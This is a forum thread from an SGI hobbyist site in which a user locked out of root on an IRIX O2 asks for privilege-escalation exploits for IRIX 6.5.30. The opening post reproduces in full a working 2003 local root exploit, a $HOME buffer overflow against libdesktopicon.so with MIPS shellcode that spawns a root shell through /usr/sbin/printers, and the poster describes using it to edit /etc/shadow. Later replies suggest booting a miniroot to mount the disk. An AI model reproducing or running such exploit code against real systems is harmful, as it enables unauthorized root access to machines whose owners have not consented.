Anyone have any go-to hacks/exploits to get IRIX root access?

gijoe77

Member
Feb 18, 2019
72
38
18
so I was playing with an older o2 (6.5.22m) - I booted it and the DALLAS battery went dead and I guess it must have reset the date to some very early date - enough that when I tried to log in as root it asked me to change the password (I actually don't even use a root password - I know - security lulz!). I thought no problem so I changed the password, but it still won't let me log in - asking me to change the password again - it's an endless loop of aged out passwords or something.

When I put the drive back into a regular functioning o2, I still can't log in as root, and the password I changed it to is not working. Both of the o2's I'm working on are the r10k models, so it would be a hassle currently to install the impacted root drive as an option drive to edit the /etc/shadow file. I thought an easier approach would be to just log into one of the guest accounts I have, run a local privilege elevation exploit and edit the /etc/shadow file in that manner.

So I went through the various exploits I was able to find via google, and basically all of the ones I was able to find were for older versions of IRIX, and I wasn't able to find any for 6.5.30 (That said they explicitly work for 6.5.30)

I have a go-to exploit that works for 6.5.22 (file is called irx_libdesktopicon.c):
Code:
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland        *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                                 #*/

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}

Once I ran this on a regular user account, I was able to modify /etc/shadow

I've been thinking of upgrading to 6.5.30 from 6.5.22, but this exploit (I tend to think of it more as a time saver for me) wont work in 6.5.30. Other then playing around with setting up an external SCSI case and mounting my issue drive in that manner, I'm wondering if anyone has a slick exploit handy that works with 6.5.30 as well
 
Edit: With apologies, I no longer wish to have involvement with SGUG or SGI communities in general,
and have also chosen to remove all of my content. Many things have changed since I co-founded, named, and ultimately
then left SGUG. There are many good people around, to whom I apologize for frustrating by removing these things, and
also many petty people that over the years whittled down both the enjoyment as well as sense of obligation I used to
feel to anyone else regarding what was ultimately just a hobby. Unfortunately one of the latter now writes the rules
and so it is time for me to take my things and go.

This message will replace all of my previous forum posts because deleting threads that I started would have removed
other peoples' posts.
 
Last edited:
shouldn't it be possible to boot sash and stuff from and install CD or over the net for miniroot and then mount the disk?
something like this..?
 
  • Like
Reactions: Elf
shouldn't it be possible to boot sash and stuff from and install CD or over the net for miniroot and then mount the disk?
something like this..?

Yeah that's another way of doing it - it's still a hassle though (need a working CDROM, gotta have the install media handy).
 

About us

  • Silicon Graphics User Group (SGUG) is a community for users, developers, and admirers of Silicon Graphics (SGI) products. We aim to be a friendly hobbyist community for discussing all aspects of SGIs, including use, software development, the IRIX Operating System, and troubleshooting, as well as facilitating hardware exchange.

User Menu